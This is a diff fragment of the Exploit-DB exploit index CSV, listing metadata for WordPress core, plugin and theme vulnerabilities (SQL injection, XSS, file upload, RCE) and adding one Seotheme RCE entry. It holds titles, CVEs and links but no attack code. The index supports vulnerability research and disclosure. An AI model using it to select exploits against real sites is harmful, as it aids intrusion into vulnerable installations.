 9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php,,2009-07-09,2017-05-04,1,CVE-2009-2334;OSVDB-55712,,,,http://www.exploit-db.comWordPress-2.8.zip,http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
 23213,exploits/php/webapps/23213.txt,"WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php,,2003-10-03,2012-12-08,1,OSVDB-4609,,,,,https://www.securityfocus.com/bid/8756/info
 30520,exploits/php/webapps/30520.txt,"WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php,,2007-08-13,2013-12-27,1,CVE-2007-4482;OSVDB-37299,,,,,https://www.securityfocus.com/bid/25413/info
@@ -33858,6 +33864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info
 37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,,
 17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip,
+51789,exploits/php/webapps/51789.py,"Wordpress Seotheme - Remote Code Execution Unauthenticated",2024-02-09,"Milad karimi",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
 51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,,